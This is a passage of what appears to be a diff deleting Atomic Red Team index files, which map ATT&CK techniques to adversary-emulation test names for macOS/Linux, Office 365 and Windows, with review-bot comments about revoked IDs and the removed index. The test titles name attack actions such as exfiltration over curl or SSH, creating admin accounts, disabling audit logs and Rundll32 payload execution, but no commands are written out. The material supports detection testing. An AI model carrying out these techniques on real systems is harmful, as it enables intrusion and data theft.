- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1489 Service Stop [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #4: Change User Password via passwd [macos, linux]
- Atomic Test #5: Delete User via dscl utility [macos]
- Atomic Test #6: Delete User via sysadminctl utility [macos]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #6: Encrypt files using 7z utility - macOS [macos]
- Atomic Test #7: Encrypt files using openssl utility - macOS [macos]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #3: Restart System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #4: Shutdown System via `shutdown` - macOS/Linux [macos, linux]
- Atomic Test #5: Restart System via `reboot` - macOS/Linux [macos, linux]
# execution
- T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.002 Command and Scripting Interpreter: AppleScript](../../T1059.002/T1059.002.md)
- Atomic Test #1: AppleScript [macos]
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1155 AppleScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.001 System Services: Launchctl](../../T1569.001/T1569.001.md)
- Atomic Test #1: Launchctl [macos]
- T1559.003 XPC Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.004 Launchd [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053.002 Scheduled Task/Job: At [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- Atomic Test #3: Create local account with admin privileges using sysadminctl utility - MacOS [macos]
- Atomic Test #4: Enable root account using dsenableroot utility - MacOS [macos]
- Atomic Test #5: Add a new/existing user to the admin group using dseditgroup utility - macOS [macos]
# exfiltration
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.003 Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
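Review bot: the privilege-escalation and lateral-movement lists mix retired pre-sub-technique ATT&CK IDs with their current sub-technique equivalents and flag both as CONTRIBUTE A TEST, for example `T1184 SSH Hijacking` alongside `T1563.001 SSH Hijacking`, `T1206 Sudo Caching` alongside `T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching`, and `T1150 Plist Modification` alongside `T1547.011 Plist Modification`. Since the older IDs were revoked in favour of the sub-techniques, consider having the index generator skip revoked technique IDs (or fold them into the replacement entry) so contributors are not directed to write tests against identifiers that ATT&CK no longer uses.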
@@ -1,124 +0,0 @@
# Office 365 Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.008 Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1114.003 Email Collection: Email Forwarding Rule](../../T1114.003/T1114.003.md)
- Atomic Test #1: Office365 - Email Forwarding [office-365]
- T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# defense-evasion
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.008 Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md)
- Atomic Test #3: Office 365 - Exchange Audit Log Disabled [office-365]
- Atomic Test #9: Office 365 - Set Audit Bypass For a Mailbox [office-365]
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518.001 Software Discovery: Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# initial-access
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.004 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.003 Additional Cloud Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Office Application Startup: Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.003 Create Account: Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098.002 Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# execution
- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1648 Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# exfiltration
- T1048 Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
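Review bot: this hunk removes the entire Office 365 platform index (`@@ -1,124 +0,0 @@`) with no replacement visible anywhere in the diff, and that file is the only place in the visible diff that points at the office-365 tests that do exist (T1114.003 test #1, T1562.008 tests #3 and #9) together with the "CONTRIBUTE A TEST" links for the uncovered techniques. If these per-platform indexes are produced by the doc generator, confirm that the generator no longer emits this file before deleting it, otherwise the next documentation run will recreate it and the diff churns back; if the removal is deliberate, say so in the commit message so readers of the history know the platform index was dropped rather than moved.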
@@ -1,1843 +0,0 @@
# Windows Atomic Tests by ATT&CK Tactic & Technique
# defense-evasion
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.011 Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
- Atomic Test #3: Rundll32 execute VBscript command using Ordinal number [windows]
- Atomic Test #4: Rundll32 advpack.dll Execution [windows]
- Atomic Test #5: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #6: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #7: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #8: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #9: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #10: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #11: Rundll32 with Ordinal Value [windows]
- Atomic Test #12: Rundll32 with Control_RunDLL [windows]
- Atomic Test #13: Rundll32 with desk.cpl [windows]
- T1143 Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1006 Direct Volume Access](../../T1006/T1006.md)
- Atomic Test #1: Read volume boot sector via DOS device path (PowerShell) [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
